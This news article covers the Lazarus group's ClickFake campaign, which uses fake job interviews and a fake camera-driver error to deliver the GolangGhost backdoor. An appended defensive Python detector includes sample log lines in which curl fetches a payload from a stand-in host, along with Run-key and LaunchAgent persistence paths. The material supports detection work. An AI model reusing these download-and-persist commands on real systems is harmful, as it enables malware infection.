North Korean Hackers Adopt ClickFix Attacks to Target Crypto Firms

The notorious North Korean Lazarus hacking group has reportedly adopted a new tactic in its cyber attacks: the "ClickFix" method. This development, reported by Sekoia, is seen as an evolution of the threat actor's previous campaigns that target job seekers in the AI and cryptocurrency space.

ClickFix is a relatively new but increasingly common tactic used by threat actors to deploy malware. It relies on fake error messages, shown on websites or in documents, claiming that the content cannot be displayed. The page then prompts the user to "fix" the issue by running PowerShell commands that download and execute the malware on the system.

Lazarus Group Impersonates Well-Known Companies

The Lazarus group has impersonated numerous well-known companies in its latest campaign, including Coinbase, KuCoin, Kraken, Circle, Securitize, BlockFi, Tether, Robinhood, and Bybit. These company names serve as lures to trick victims into downloading and running malware.

Sekoia analyzed 184 different invitations retrieved from fake interview websites and found that 14 company names were used to lure the victim into completing the application process. This indicates that Lazarus is using these tactics to target job seekers in the cryptocurrency industry, particularly centralized finance (CeFi) companies.

ClickFake Campaigns

In February 2025, Sekoia reported that Lazarus started using "ClickFake" campaigns that employ ClickFix tactics. These attacks are different from its previous Contagious Interview campaign, which targeted developers and coders.

The ClickFake attacks involve inviting targets to a remote interview by following a link to a legitimate-appearing site built in ReactJS. The site features contact forms, open-ended questions, and a request for a video introduction. When the target attempts to record the video using their webcam, a fake error appears, claiming a driver issue is preventing camera access.

GolangGhost Malware

The victims are instructed to run a curl command in CMD (Windows) or Terminal (macOS), which infects them with a Go-based backdoor named "GolangGhost". This malware establishes persistence via registry modification and LaunchAgent plist files, and connects to its command and control (C2) server.

GolangGhost can perform file operations, execute shell commands, and steal Chrome cookies, browsing history, and stored passwords. It also harvests system metadata. The malware is highly versatile and can be used for various malicious purposes.

Prevention and Detection

As Lazarus diversifies its attack methods, potential targets must remain vigilant and stay up-to-date with the latest developments. Consistently verifying interview invitations before downloading or executing anything on their systems is crucial.

Sekoia has shared Yara rules that organizations can use to detect and block ClickFake activity in their environments, as well as a complete list of indicators of compromise associated with the latest Lazarus campaigns. By staying informed and taking proactive measures, individuals and organizations can reduce the risk of falling victim to these attacks.
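The chain described above (a curl download launched from an interactive shell, followed shortly by a Run-key or LaunchAgent persistence write on the same host) can also be caught in endpoint telemetry. The following is an added example, not Sekoia's Yara rules or the article's own material; the pipe-delimited log format and every event in it are constructed for illustration.

```python
import re

# Constructed sample telemetry, one event per line: ts|host|type|parent|detail.
# Hypothetical format and values; not from Sekoia's report or a real incident.
SAMPLE_LOG = r"""
1712000000|wks01|proc|cmd.exe|curl -o %TEMP%\cam-driver.zip https://fake-interview.invalid/driver.zip
1712000004|wks01|proc|cmd.exe|tar -xf %TEMP%\cam-driver.zip
1712000020|wks01|persist|reg.exe|HKCU\Software\Microsoft\Windows\CurrentVersion\Run\CamDriver
1712000300|mac02|proc|zsh|curl -o /tmp/driver.sh https://fake-interview.invalid/driver.sh
1712000330|mac02|persist|bash|/Users/dev/Library/LaunchAgents/com.camdriver.plist
1712001000|wks03|proc|cmd.exe|curl -o report.json https://internal.invalid/api
1712009999|wks03|persist|installer.exe|HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater
"""

# Shells a user would paste a ClickFix command into (CMD / Terminal).
INTERACTIVE_SHELLS = {"cmd.exe", "powershell.exe", "zsh", "bash", "sh"}
# curl writing a payload to disk (-o / -O / --output).
CURL_DL = re.compile(r"\bcurl\b.*(?:\s-o\s|\s-O\b|--output)", re.I)
# The two persistence locations named in the article: Run key and LaunchAgents plist.
PERSIST = re.compile(r"CurrentVersion\\Run|/LaunchAgents/[^\s]+\.plist", re.I)


def parse(log):
    """Turn the pipe-delimited sample log into a list of event dicts."""
    events = []
    for line in log.strip().splitlines():
        ts, host, kind, parent, detail = line.split("|", 4)
        events.append({"ts": int(ts), "host": host, "kind": kind,
                       "parent": parent, "detail": detail})
    return events


def find_clickfix_chains(events, window=600):
    """Return (host, curl_ts, persist_ts) for every curl download spawned from an
    interactive shell that is followed, on the same host and within `window`
    seconds, by a Run-key or LaunchAgent persistence write."""
    alerts = []
    downloads = [e for e in events if e["kind"] == "proc"
                 and e["parent"].lower() in INTERACTIVE_SHELLS
                 and CURL_DL.search(e["detail"])]
    for d in downloads:
        for e in events:
            if (e["host"] == d["host"] and e["kind"] == "persist"
                    and 0 <= e["ts"] - d["ts"] <= window
                    and PERSIST.search(e["detail"])):
                alerts.append((d["host"], d["ts"], e["ts"]))
                break  # one alert per download is enough
    return alerts


if __name__ == "__main__":
    for host, t_dl, t_persist in find_clickfix_chains(parse(SAMPLE_LOG)):
        print(f"ALERT {host}: shell curl download at {t_dl}, persistence at {t_persist}")
```

wks03 is left alone on purpose: its download and its persistence write are hours apart and the write comes from an installer, so the time window keeps routine admin activity from tripping the rule.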

Stay Informed and Stay Safe

Never execute anything you have copied from the internet on the Windows Command Prompt or macOS Terminal, especially if you don't fully understand what it does. By being cautious and informed, you can protect yourself against the latest Lazarus hacking campaigns.